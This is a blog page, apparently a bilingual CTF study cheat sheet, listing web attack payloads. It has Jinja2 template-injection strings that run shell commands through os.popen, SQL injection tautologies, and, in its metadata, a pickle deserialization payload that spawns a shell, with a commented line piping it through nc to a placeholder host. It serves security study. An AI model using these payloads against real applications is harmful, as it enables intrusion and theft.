<!doctype html>
<!--
  Minimal Mistakes Jekyll Theme 4.26.1 by Michael Rose
  Copyright 2013-2024 Michael Rose - mademistakes.com | @mmistakes
  Free for personal and commercial use under the MIT license
  https://github.com/mmistakes/minimal-mistakes/blob/master/LICENSE
-->

<html lang="en" class="no-js">
  <head>
    <meta charset="utf-8">

<!-- begin _includes/seo.html --><title>web note (update 2021.10.27) - Hacky Life &amp; Writeup</title>
<meta name="description" content="post will be frequently updated  SSTI (Server Side Template Injection) 해당 취약점은 웹 프레임워크에서 사용되는 여러 가지 Template Engine에서 발생하며, 특별한 구문을 통해 RCE를 일으킬 수도 있다. This vulnerability occurs in various Template Engines used in web frameworks, RCE and can also be triggered through special syntax.  ▶ jinja2 # 기본 {{ 4*4 }} =&gt; 16  # check with config {{ config }} {{ config.items() }} {{ config[&#39;secret_key&#39;] }}  # RCE with config {{ config.__class__.__init__.__globals__[&#39;os&#39;].popen(&quot;ls&quot;).read() }} {{ (config|attr(&quot;__class__&quot;)).__init__.__globals__[&#39;os&#39;].popen(&#39;cat flag&#39;).read() }}  # etc (&#39;&#39;,(),get_flashed_messages, url_for, ...) {{ &#39;&#39;.__class__.__mro__[1].__subclasses__()[**index**](&#39;cat flag&#39;, shell=True, stdout=-1).communicate() }} {{ get_flashed_messages.__globals__.__builtins__.open(&quot;/flag&quot;).read() }} {{ url_for.__globals__.__builtins__.eval(&#39;__import__(&quot;os&quot;).popen(&quot;ls -al&quot;).read()&#39;) }}   # with request - 필터링이 매우 많을 경우 more query + request를 활용하여 우회 http://foo.bar/?payload={{ request|attr(&#39;class&#39;)|attr(request.args.get(&#39;mro&#39;))|attr(request.args.get(&#39;getitem&#39;))(1) }}&amp;class=__class__&amp;mro=__mro__&amp;getitem=__getitem__ {{request|attr(&#39;application&#39;)|attr(&#39;__globals__&#39;)|attr(&#39;__getitem__&#39;)(&#39;__builtins__&#39;)|attr(&#39;__getitem__&#39;)(&#39;__import__&#39;)(&#39;os&#39;)|attr(&#39;popen&#39;)(&#39;id&#39;)|attr(&#39;read&#39;)()}}     SQLI (sql injection) 해당 취약점은 DB를 관리하는 응용 프로그램에서 SQL 쿼리를 전달할 때 의도하지 않은 구문을 전달할 수 있도록 변조시키는 데 목적이 있다. The vulnerability is aimed at modulating the DB management application to deliver unintended phrases when delivering SQL queries.  1. Comment symbol    /* ~ */, -- ~, # (URL encoded : %23)   -- example. Select * from tbl where id=&#39;(user_input)&#39;  -- Select ALL query from tbl user_input=&quot;&#39; or 1=1-- &quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1--&#39; user_input=&quot;&#39; or 1=1#&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1# user_input=&quot;&#39; or 1=1/*1234*/&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1/*1234*/&#39; ...? (must have closed symbol)   2. with single quarter    id가 &#39;&#39;로 감싸져 있을 경우 &#39;를 input으로 넣어 먼저 닫아주게끔 한 뒤 조건문을 이어준다.   -- example. Select * from tbl where id=&#39;(user_input)&#39;  -- Select ALL query from tbl user_input=&quot;&#39; or 1=&#39;1&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=&#39;1&#39;   3. and, or, &amp;&amp;, ||, in, between, like -- and, or Select * from tbl where id=&#39;1234&#39; and pw=&#39;5678&#39; Select * from tbl where id=&#39;1234&#39; or pw=&#39;5678&#39;  -- &amp;&amp;, || (no space required) Select * from tbl where id=&#39;1234&#39;&amp;&amp;pw=&#39;5678&#39; Select * from tbl where id=&#39;1234&#39;||pw=&#39;5678&#39;  -- in Select * from tbl where id in &#39;1234&#39; and pw in &#39;5678&#39;  -- between and (both number and char are possible) Select * from tbl where age between 20 and 30 -- 20&lt;=age&lt;=30 Select * from tbl where score between &#39;A&#39; and &#39;C&#39; -- &#39;A&#39;&lt;=score&lt;=&#39;C&#39;  --like (starts with ~, ends with ~, include ~, length) Select * from tbl where name like &#39;Bae%&#39; -- starts with Bae Select * from tbl where name like &#39;%uk&#39; -- ends with uk Select * from tbl where name like &#39;%won%&#39; -- include won Select * from tbl where name like &#39;___&#39; -- length 3 chars Select * from tbl where binary name like &#39;~&#39; -- distinguish upper/lower   4. Internal function in mysql    char(...) : change integer arguments to char (ex. char(0x61,0x62,0x63)=&gt;&quot;abc&quot;)   mid/substr[ing](a,b,c) : get c bytes in a from b(starts from 1 ~ ..)   left(a,b) / right(a,b) : get b bytes in a (begin / end(reverse but print correctly))   version() : get mysql version   database() : get current database     python pickle deserialization pickle로 직렬화된 객체가 변조되어 역직렬화하는 과정에서 시스템에 접근하거나 의도치 않은 것이 실행되기도 한다. 원하는 class를 선언한 뒤, __reduce__를 통하여 pickle.loads 함수에서 unpickle 시 tuple을 반환하여 함수를 실행시킬 수 있다.  import os import pickle  class payload(object):   def __reduce__(self):     #return (os.system, (&#39;ls&#39;, ))     #return (os.system, (&#39;cat flag&#39;, ))     return (os.system, (&#39;/bin/sh&#39;, ))     #return (os.system, (&#39;/bin/sh | nc [ip] [port]&#39;, ))  pickle_d=pickle.dumps(payload()) pickle.loads(pickle_d) # get shell anyway  $ id uid=1000(test) gid=1000(test) groups=1000(test)   update 예정.">


  <meta name="author" content="st4rlight (Ainsetin)">
  
  <meta property="article:author" content="st4rlight (Ainsetin)">
  


<meta property="og:type" content="article">
<meta property="og:locale" content="en_US">
<meta property="og:site_name" content="Hacky Life & Writeup">
<meta property="og:title" content="web note (update 2021.10.27)">
<meta property="og:url" content="http://localhost:4000/note/web-note-update/">


  <meta property="og:description" content="post will be frequently updated  SSTI (Server Side Template Injection) 해당 취약점은 웹 프레임워크에서 사용되는 여러 가지 Template Engine에서 발생하며, 특별한 구문을 통해 RCE를 일으킬 수도 있다. This vulnerability occurs in various Template Engines used in web frameworks, RCE and can also be triggered through special syntax.  ▶ jinja2 # 기본 {{ 4*4 }} =&gt; 16  # check with config {{ config }} {{ config.items() }} {{ config[&#39;secret_key&#39;] }}  # RCE with config {{ config.__class__.__init__.__globals__[&#39;os&#39;].popen(&quot;ls&quot;).read() }} {{ (config|attr(&quot;__class__&quot;)).__init__.__globals__[&#39;os&#39;].popen(&#39;cat flag&#39;).read() }}  # etc (&#39;&#39;,(),get_flashed_messages, url_for, ...) {{ &#39;&#39;.__class__.__mro__[1].__subclasses__()[**index**](&#39;cat flag&#39;, shell=True, stdout=-1).communicate() }} {{ get_flashed_messages.__globals__.__builtins__.open(&quot;/flag&quot;).read() }} {{ url_for.__globals__.__builtins__.eval(&#39;__import__(&quot;os&quot;).popen(&quot;ls -al&quot;).read()&#39;) }}   # with request - 필터링이 매우 많을 경우 more query + request를 활용하여 우회 http://foo.bar/?payload={{ request|attr(&#39;class&#39;)|attr(request.args.get(&#39;mro&#39;))|attr(request.args.get(&#39;getitem&#39;))(1) }}&amp;class=__class__&amp;mro=__mro__&amp;getitem=__getitem__ {{request|attr(&#39;application&#39;)|attr(&#39;__globals__&#39;)|attr(&#39;__getitem__&#39;)(&#39;__builtins__&#39;)|attr(&#39;__getitem__&#39;)(&#39;__import__&#39;)(&#39;os&#39;)|attr(&#39;popen&#39;)(&#39;id&#39;)|attr(&#39;read&#39;)()}}     SQLI (sql injection) 해당 취약점은 DB를 관리하는 응용 프로그램에서 SQL 쿼리를 전달할 때 의도하지 않은 구문을 전달할 수 있도록 변조시키는 데 목적이 있다. The vulnerability is aimed at modulating the DB management application to deliver unintended phrases when delivering SQL queries.  1. Comment symbol    /* ~ */, -- ~, # (URL encoded : %23)   -- example. Select * from tbl where id=&#39;(user_input)&#39;  -- Select ALL query from tbl user_input=&quot;&#39; or 1=1-- &quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1--&#39; user_input=&quot;&#39; or 1=1#&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1# user_input=&quot;&#39; or 1=1/*1234*/&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1/*1234*/&#39; ...? (must have closed symbol)   2. with single quarter    id가 &#39;&#39;로 감싸져 있을 경우 &#39;를 input으로 넣어 먼저 닫아주게끔 한 뒤 조건문을 이어준다.   -- example. Select * from tbl where id=&#39;(user_input)&#39;  -- Select ALL query from tbl user_input=&quot;&#39; or 1=&#39;1&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=&#39;1&#39;   3. and, or, &amp;&amp;, ||, in, between, like -- and, or Select * from tbl where id=&#39;1234&#39; and pw=&#39;5678&#39; Select * from tbl where id=&#39;1234&#39; or pw=&#39;5678&#39;  -- &amp;&amp;, || (no space required) Select * from tbl where id=&#39;1234&#39;&amp;&amp;pw=&#39;5678&#39; Select * from tbl where id=&#39;1234&#39;||pw=&#39;5678&#39;  -- in Select * from tbl where id in &#39;1234&#39; and pw in &#39;5678&#39;  -- between and (both number and char are possible) Select * from tbl where age between 20 and 30 -- 20&lt;=age&lt;=30 Select * from tbl where score between &#39;A&#39; and &#39;C&#39; -- &#39;A&#39;&lt;=score&lt;=&#39;C&#39;  --like (starts with ~, ends with ~, include ~, length) Select * from tbl where name like &#39;Bae%&#39; -- starts with Bae Select * from tbl where name like &#39;%uk&#39; -- ends with uk Select * from tbl where name like &#39;%won%&#39; -- include won Select * from tbl where name like &#39;___&#39; -- length 3 chars Select * from tbl where binary name like &#39;~&#39; -- distinguish upper/lower   4. Internal function in mysql    char(...) : change integer arguments to char (ex. char(0x61,0x62,0x63)=&gt;&quot;abc&quot;)   mid/substr[ing](a,b,c) : get c bytes in a from b(starts from 1 ~ ..)   left(a,b) / right(a,b) : get b bytes in a (begin / end(reverse but print correctly))   version() : get mysql version   database() : get current database     python pickle deserialization pickle로 직렬화된 객체가 변조되어 역직렬화하는 과정에서 시스템에 접근하거나 의도치 않은 것이 실행되기도 한다. 원하는 class를 선언한 뒤, __reduce__를 통하여 pickle.loads 함수에서 unpickle 시 tuple을 반환하여 함수를 실행시킬 수 있다.  import os import pickle  class payload(object):   def __reduce__(self):     #return (os.system, (&#39;ls&#39;, ))     #return (os.system, (&#39;cat flag&#39;, ))     return (os.system, (&#39;/bin/sh&#39;, ))     #return (os.system, (&#39;/bin/sh | nc [ip] [port]&#39;, ))  pickle_d=pickle.dumps(payload()) pickle.loads(pickle_d) # get shell anyway  $ id uid=1000(test) gid=1000(test) groups=1000(test)   update 예정.">







  <meta property="article:published_time" content="2021-10-27T10:00:00+09:00">





  

  


<link rel="canonical" href="http://localhost:4000/note/web-note-update/">












<!-- end _includes/seo.html -->



  <link href="/feed.xml" type="application/atom+xml" rel="alternate" title="Hacky Life & Writeup Feed">
<meta name="viewport" content="width=device-width, initial-scale=1.0">

<script type="text/javascript">
  document.documentElement.className = document.documentElement.className.replace(/\bno-js\b/g, '') + ' js ';
  window.enable_copy_code_button = true;
</script>

<!-- For all browsers -->
<link rel="stylesheet" href="/assets/css/main.css">
<link rel="preload" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@latest/css/all.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'">
<noscript><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@latest/css/all.min.css"></noscript>





    <!-- start custom head snippets -->

<!-- insert favicons. use https://realfavicongenerator.net/ -->

<!-- end custom head snippets -->

  </head>

  <body class="layout--single">
    <nav class="skip-links">
  <ul>
    <li><a href="#site-nav" class="screen-reader-shortcut">Skip to primary navigation</a></li>
    <li><a href="#main" class="screen-reader-shortcut">Skip to content</a></li>
    <li><a href="#footer" class="screen-reader-shortcut">Skip to footer</a></li>
  </ul>
</nav>

    

<div class="masthead">
  <div class="masthead__inner-wrap">
    <div class="masthead__menu">
      <nav id="site-nav" class="greedy-nav">
        
        <a class="site-title" href="/">
          Hacky Life & Writeup
          
        </a>
        <ul class="visible-links"><li class="masthead__menu-item">
              <a
                href="/about/"
                
                
              >About</a>
            </li><li class="masthead__menu-item">
              <a
                href="/categories/ctf/"
                
                
              >Note</a>
            </li><li class="masthead__menu-item">
              <a
                href="/categories/ctf/"
                
                
              >CTF Write-up</a>
            </li><li class="masthead__menu-item">
              <a
                href="/categories/life/"
                
                
              >Life</a>
            </li><li class="masthead__menu-item">
              <a
                href="https://ainsetin.notion.site/Ainsetin-s-Write-up-c1a0fb95760b41508d54ce94dc3601c5"
                
                
              >Notion</a>
            </li><li class="masthead__menu-item">
              <a
                href="https://discord.gg/RpBGcjSWZN"
                
                
              >Discord</a>
            </li></ul>
        
        <button class="search__toggle" type="button">
          <span class="visually-hidden">Toggle search</span>
          <i class="fas fa-search"></i>
        </button>
        
        <button class="greedy-nav__toggle hidden" type="button">
          <span class="visually-hidden">Toggle menu</span>
          <div class="navicon"></div>
        </button>
        <ul class="hidden-links hidden"></ul>
      </nav>
    </div>
  </div>
</div>


    <div class="initial-content">
      





<div id="main" role="main">
  
  <div class="sidebar sticky">
  


<div itemscope itemtype="https://schema.org/Person" class="h-card">

  
    <div class="author__avatar">
      <a href="http://localhost:4000/">
        <img src="/assets/images/profile.jpg" alt="st4rlight (Ainsetin)" itemprop="image" class="u-photo">
      </a>
    </div>
  

  <div class="author__content">
    <h3 class="author__name p-name" itemprop="name">
      <a class="u-url" rel="me" href="http://localhost:4000/" itemprop="url">st4rlight (Ainsetin)</a>
    </h3>
    
      <div class="author__bio p-note" itemprop="description">
        <p>be the special st4rlight in the world</p>

      </div>
    
  </div>

  <div class="author__urls-wrapper">
    <button class="btn btn--inverse">Follow</button>
    <ul class="author__urls social-icons">
      
        <li itemprop="homeLocation" itemscope itemtype="https://schema.org/Place">
          <i class="fas fa-fw fa-map-marker-alt" aria-hidden="true"></i> <span itemprop="name" class="p-locality">Seoul, Korea</span>
        </li>
      

      
        
          
        
          
        
          
            <li><a href="https://x.com/ainsetin" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-twitter-square" aria-hidden="true"></i><span class="label">X</span></a></li>
          
        
          
            <li><a href="https://facebook.com/ainsetin" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-facebook-square" aria-hidden="true"></i><span class="label">Facebook</span></a></li>
          
        
          
            <li><a href="https://github.com/bww9641" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-github" aria-hidden="true"></i><span class="label">GitHub</span></a></li>
          
        
          
            <li><a href="https://instagram.com/st4rlight_bww" rel="nofollow noopener noreferrer me" itemprop="sameAs"><i class="fab fa-fw fa-instagram" aria-hidden="true"></i><span class="label">Instagram</span></a></li>
          
        
      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      

      <!--
  <li>
    <a href="http://link-to-whatever-social-network.com/user/" itemprop="sameAs" rel="nofollow noopener noreferrer me">
      <i class="fas fa-fw" aria-hidden="true"></i> Custom Social Profile Link
    </a>
  </li>
-->
    </ul>
  </div>
</div>

  
    
      
      
      
      
    
    
      <nav class="nav__list">
  
  <input id="ac-toc" name="accordion-toc" type="checkbox" />
  <label for="ac-toc">Toggle menu</label>
  <ul class="nav__items">
    
      
      
    
  </ul>
</nav>

    
  
  </div>



  <article class="page" itemscope itemtype="https://schema.org/CreativeWork">
    <meta itemprop="headline" content="web note (update 2021.10.27)">
    <meta itemprop="description" content="post will be frequently updatedSSTI (Server Side Template Injection)해당 취약점은 웹 프레임워크에서 사용되는 여러 가지 Template Engine에서 발생하며, 특별한 구문을 통해 RCE를 일으킬 수도 있다.This vulnerability occurs in various Template Engines used in web frameworks, RCE and can also be triggered through special syntax.▶ jinja2# 기본{{ 4*4 }} =&gt; 16# check with config{{ config }}{{ config.items() }}{{ config[&#39;secret_key&#39;] }}# RCE with config{{ config.__class__.__init__.__globals__[&#39;os&#39;].popen(&quot;ls&quot;).read() }}{{ (config|attr(&quot;__class__&quot;)).__init__.__globals__[&#39;os&#39;].popen(&#39;cat flag&#39;).read() }}# etc (&#39;&#39;,(),get_flashed_messages, url_for, ...){{ &#39;&#39;.__class__.__mro__[1].__subclasses__()[**index**](&#39;cat flag&#39;, shell=True, stdout=-1).communicate() }}{{ get_flashed_messages.__globals__.__builtins__.open(&quot;/flag&quot;).read() }}{{ url_for.__globals__.__builtins__.eval(&#39;__import__(&quot;os&quot;).popen(&quot;ls -al&quot;).read()&#39;) }}# with request - 필터링이 매우 많을 경우 more query + request를 활용하여 우회http://foo.bar/?payload={{ request|attr(&#39;class&#39;)|attr(request.args.get(&#39;mro&#39;))|attr(request.args.get(&#39;getitem&#39;))(1) }}&amp;class=__class__&amp;mro=__mro__&amp;getitem=__getitem__{{request|attr(&#39;application&#39;)|attr(&#39;__globals__&#39;)|attr(&#39;__getitem__&#39;)(&#39;__builtins__&#39;)|attr(&#39;__getitem__&#39;)(&#39;__import__&#39;)(&#39;os&#39;)|attr(&#39;popen&#39;)(&#39;id&#39;)|attr(&#39;read&#39;)()}}SQLI (sql injection)해당 취약점은 DB를 관리하는 응용 프로그램에서 SQL 쿼리를 전달할 때 의도하지 않은 구문을 전달할 수 있도록 변조시키는 데 목적이 있다.The vulnerability is aimed at modulating the DB management application to deliver unintended phrases when delivering SQL queries.1. Comment symbol  /* ~ */, -- ~, # (URL encoded : %23)-- example.Select * from tbl where id=&#39;(user_input)&#39;-- Select ALL query from tbluser_input=&quot;&#39; or 1=1-- &quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1--&#39;user_input=&quot;&#39; or 1=1#&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1#user_input=&quot;&#39; or 1=1/*1234*/&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=1/*1234*/&#39; ...?(must have closed symbol)2. with single quarter  id가 &#39;&#39;로 감싸져 있을 경우 &#39;를 input으로 넣어 먼저 닫아주게끔 한 뒤 조건문을 이어준다.-- example.Select * from tbl where id=&#39;(user_input)&#39;-- Select ALL query from tbluser_input=&quot;&#39; or 1=&#39;1&quot; =&gt; Select * from tbl where id=&#39;&#39; or 1=&#39;1&#39;3. and, or, &amp;&amp;, ||, in, between, like-- and, orSelect * from tbl where id=&#39;1234&#39; and pw=&#39;5678&#39;Select * from tbl where id=&#39;1234&#39; or pw=&#39;5678&#39;-- &amp;&amp;, || (no space required)Select * from tbl where id=&#39;1234&#39;&amp;&amp;pw=&#39;5678&#39;Select * from tbl where id=&#39;1234&#39;||pw=&#39;5678&#39;-- inSelect * from tbl where id in &#39;1234&#39; and pw in &#39;5678&#39;-- between and (both number and char are possible)Select * from tbl where age between 20 and 30 -- 20&lt;=age&lt;=30Select * from tbl where score between &#39;A&#39; and &#39;C&#39; -- &#39;A&#39;&lt;=score&lt;=&#39;C&#39;--like (starts with ~, ends with ~, include ~, length)Select * from tbl where name like &#39;Bae%&#39; -- starts with BaeSelect * from tbl where name like &#39;%uk&#39; -- ends with ukSelect * from tbl where name like &#39;%won%&#39; -- include wonSelect * from tbl where name like &#39;___&#39; -- length 3 charsSelect * from tbl where binary name like &#39;~&#39; -- distinguish upper/lower4. Internal function in mysql  char(...) : change integer arguments to char (ex. char(0x61,0x62,0x63)=&gt;&quot;abc&quot;)  mid/substr[ing](a,b,c) : get c bytes in a from b(starts from 1 ~ ..)  left(a,b) / right(a,b) : get b bytes in a (begin / end(reverse but print correctly))  version() : get mysql version  database() : get current databasepython pickle deserializationpickle로 직렬화된 객체가 변조되어 역직렬화하는 과정에서 시스템에 접근하거나 의도치 않은 것이 실행되기도 한다. 원하는 class를 선언한 뒤, __reduce__를 통하여 pickle.loads 함수에서 unpickle 시 tuple을 반환하여 함수를 실행시킬 수 있다.import osimport pickleclass payload(object):  def __reduce__(self):    #return (os.system, (&#39;ls&#39;, ))    #return (os.system, (&#39;cat flag&#39;, ))    return (os.system, (&#39;/bin/sh&#39;, ))    #return (os.system, (&#39;/bin/sh | nc [ip] [port]&#39;, ))pickle_d=pickle.dumps(payload())pickle.loads(pickle_d) # get shell anyway$ iduid=1000(test) gid=1000(test) groups=1000(test)update 예정.">
    <meta itemprop="datePublished" content="2021-10-27T10:00:00+09:00">
    

    <div class="page__inner-wrap">
      
        <header>
          <h1 id="page-title" class="page__title" itemprop="headline">
            <a href="http://localhost:4000/note/web-note-update/" itemprop="url">web note (update 2021.10.27)
</a>
          </h1>
          

  <p class="page__meta">
    

    

    
      
      

      <span class="page__meta-readtime">
        <i class="far fa-clock" aria-hidden="true"></i>
        
          2 minute read
        
      </span>
    
  </p>


        </header>
      

      <section class="page__content" itemprop="text">
        
          <aside class="sidebar__right ">
            <nav class="toc">
              <header><h4 class="nav__title"><i class="fas fa-file-alt"></i> On this page</h4></header>
              <ul class="toc__menu"><li><a href="#ssti-server-side-template-injection">SSTI (Server Side Template Injection)</a></li><li><a href="#sqli-sql-injection">SQLI (sql injection)</a></li><li><a href="#python-pickle-deserialization">python pickle deserialization</a></li></ul>
            </nav>
          </aside>
        
        <p><em>post will be frequently updated</em></p>

<h2 id="ssti-server-side-template-injection">SSTI (Server Side Template Injection)</h2>
<p>해당 취약점은 웹 프레임워크에서 사용되는 여러 가지 Template Engine에서 발생하며, 특별한 구문을 통해 <code class="language-plaintext highlighter-rouge">RCE</code>를 일으킬 수도 있다.<br />
This vulnerability occurs in various Template Engines used in web frameworks, RCE and can also be triggered through special syntax.</p>

<p>▶ jinja2</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># 기본
</span><span class="p">{{</span> <span class="mi">4</span><span class="o">*</span><span class="mi">4</span> <span class="p">}}</span> <span class="o">=&gt;</span> <span class="mi">16</span>

<span class="c1"># check with config
</span><span class="p">{{</span> <span class="n">config</span> <span class="p">}}</span>
<span class="p">{{</span> <span class="n">config</span><span class="p">.</span><span class="nf">items</span><span class="p">()</span> <span class="p">}}</span>
<span class="p">{{</span> <span class="n">config</span><span class="p">[</span><span class="sh">'</span><span class="s">secret_key</span><span class="sh">'</span><span class="p">]</span> <span class="p">}}</span>

<span class="c1"># RCE with config
</span><span class="p">{{</span> <span class="n">config</span><span class="p">.</span><span class="n">__class__</span><span class="p">.</span><span class="n">__init__</span><span class="p">.</span><span class="n">__globals__</span><span class="p">[</span><span class="sh">'</span><span class="s">os</span><span class="sh">'</span><span class="p">].</span><span class="nf">popen</span><span class="p">(</span><span class="sh">"</span><span class="s">ls</span><span class="sh">"</span><span class="p">).</span><span class="nf">read</span><span class="p">()</span> <span class="p">}}</span>
<span class="p">{{</span> <span class="p">(</span><span class="n">config</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">"</span><span class="s">__class__</span><span class="sh">"</span><span class="p">)).</span><span class="n">__init__</span><span class="p">.</span><span class="n">__globals__</span><span class="p">[</span><span class="sh">'</span><span class="s">os</span><span class="sh">'</span><span class="p">].</span><span class="nf">popen</span><span class="p">(</span><span class="sh">'</span><span class="s">cat flag</span><span class="sh">'</span><span class="p">).</span><span class="nf">read</span><span class="p">()</span> <span class="p">}}</span>

<span class="c1"># etc ('',(),get_flashed_messages, url_for, ...)
</span><span class="p">{{</span> <span class="sh">''</span><span class="p">.</span><span class="n">__class__</span><span class="p">.</span><span class="n">__mro__</span><span class="p">[</span><span class="mi">1</span><span class="p">].</span><span class="nf">__subclasses__</span><span class="p">()[</span><span class="o">**</span><span class="n">index</span><span class="o">**</span><span class="p">](</span><span class="sh">'</span><span class="s">cat flag</span><span class="sh">'</span><span class="p">,</span> <span class="n">shell</span><span class="o">=</span><span class="bp">True</span><span class="p">,</span> <span class="n">stdout</span><span class="o">=-</span><span class="mi">1</span><span class="p">).</span><span class="nf">communicate</span><span class="p">()</span> <span class="p">}}</span>
<span class="p">{{</span> <span class="n">get_flashed_messages</span><span class="p">.</span><span class="n">__globals__</span><span class="p">.</span><span class="n">__builtins__</span><span class="p">.</span><span class="nf">open</span><span class="p">(</span><span class="sh">"</span><span class="s">/flag</span><span class="sh">"</span><span class="p">).</span><span class="nf">read</span><span class="p">()</span> <span class="p">}}</span>
<span class="p">{{</span> <span class="n">url_for</span><span class="p">.</span><span class="n">__globals__</span><span class="p">.</span><span class="n">__builtins__</span><span class="p">.</span><span class="nf">eval</span><span class="p">(</span><span class="sh">'</span><span class="s">__import__(</span><span class="sh">"</span><span class="s">os</span><span class="sh">"</span><span class="s">).popen(</span><span class="sh">"</span><span class="s">ls -al</span><span class="sh">"</span><span class="s">).read()</span><span class="sh">'</span><span class="p">)</span> <span class="p">}}</span>
</code></pre></div></div>

<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># with request - 필터링이 매우 많을 경우 more query + request를 활용하여 우회
</span><span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">foo</span><span class="p">.</span><span class="n">bar</span><span class="o">/</span><span class="err">?</span><span class="n">payload</span><span class="o">=</span><span class="p">{{</span> <span class="n">request</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">class</span><span class="sh">'</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">mro</span><span class="sh">'</span><span class="p">))</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="n">request</span><span class="p">.</span><span class="n">args</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="sh">'</span><span class="s">getitem</span><span class="sh">'</span><span class="p">))(</span><span class="mi">1</span><span class="p">)</span> <span class="p">}}</span><span class="o">&amp;</span><span class="n">class</span><span class="o">=</span><span class="n">__class__</span><span class="o">&amp;</span><span class="n">mro</span><span class="o">=</span><span class="n">__mro__</span><span class="o">&amp;</span><span class="n">getitem</span><span class="o">=</span><span class="n">__getitem__</span>
<span class="p">{{</span><span class="n">request</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">application</span><span class="sh">'</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">__globals__</span><span class="sh">'</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">__getitem__</span><span class="sh">'</span><span class="p">)(</span><span class="sh">'</span><span class="s">__builtins__</span><span class="sh">'</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">__getitem__</span><span class="sh">'</span><span class="p">)(</span><span class="sh">'</span><span class="s">__import__</span><span class="sh">'</span><span class="p">)(</span><span class="sh">'</span><span class="s">os</span><span class="sh">'</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">popen</span><span class="sh">'</span><span class="p">)(</span><span class="sh">'</span><span class="s">id</span><span class="sh">'</span><span class="p">)</span><span class="o">|</span><span class="nf">attr</span><span class="p">(</span><span class="sh">'</span><span class="s">read</span><span class="sh">'</span><span class="p">)()}}</span>
</code></pre></div></div>

<p><br /></p>

<h2 id="sqli-sql-injection">SQLI (sql injection)</h2>
<p>해당 취약점은 DB를 관리하는 응용 프로그램에서 SQL 쿼리를 전달할 때 의도하지 않은 구문을 전달할 수 있도록 변조시키는 데 목적이 있다.<br />
The vulnerability is aimed at modulating the DB management application to deliver unintended phrases when delivering SQL queries.</p>

<p><strong>1. Comment symbol</strong></p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">/* ~ */</code>, <code class="language-plaintext highlighter-rouge">-- ~</code>, <code class="language-plaintext highlighter-rouge">#</code> (URL encoded : <code class="language-plaintext highlighter-rouge">%23</code>)</li>
</ul>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">-- example.</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">'(user_input)'</span>

<span class="c1">-- Select ALL query from tbl</span>
<span class="n">user_input</span><span class="o">=</span><span class="nv">"' or 1=1-- "</span> <span class="o">=&gt;</span> <span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="c1">--'</span>
<span class="n">user_input</span><span class="o">=</span><span class="nv">"' or 1=1#"</span> <span class="o">=&gt;</span> <span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="o">#</span>
<span class="n">user_input</span><span class="o">=</span><span class="nv">"' or 1=1/*1234*/"</span> <span class="o">=&gt;</span> <span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">''</span> <span class="k">or</span> <span class="mi">1</span><span class="o">=</span><span class="mi">1</span><span class="cm">/*1234*/</span><span class="s1">' ...?
(must have closed symbol)
</span></code></pre></div></div>

<p><strong>2. with single quarter</strong></p>
<ul>
  <li>id가 <code class="language-plaintext highlighter-rouge">''</code>로 감싸져 있을 경우 <code class="language-plaintext highlighter-rouge">'</code>를 input으로 넣어 먼저 닫아주게끔 한 뒤 조건문을 이어준다.</li>
</ul>

<div class="language-sql highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">-- example.</span>
<span class="k">Select</span> <span class="o">*</span> <span class="k">from</span> <span class="n">tbl</span> <span class="k">where</span> <span class="n">id</span><span class="o">=</span><span class="s1">'(user_input)'</span>

<span class="c1">-- Select ALL query from tbl</span>
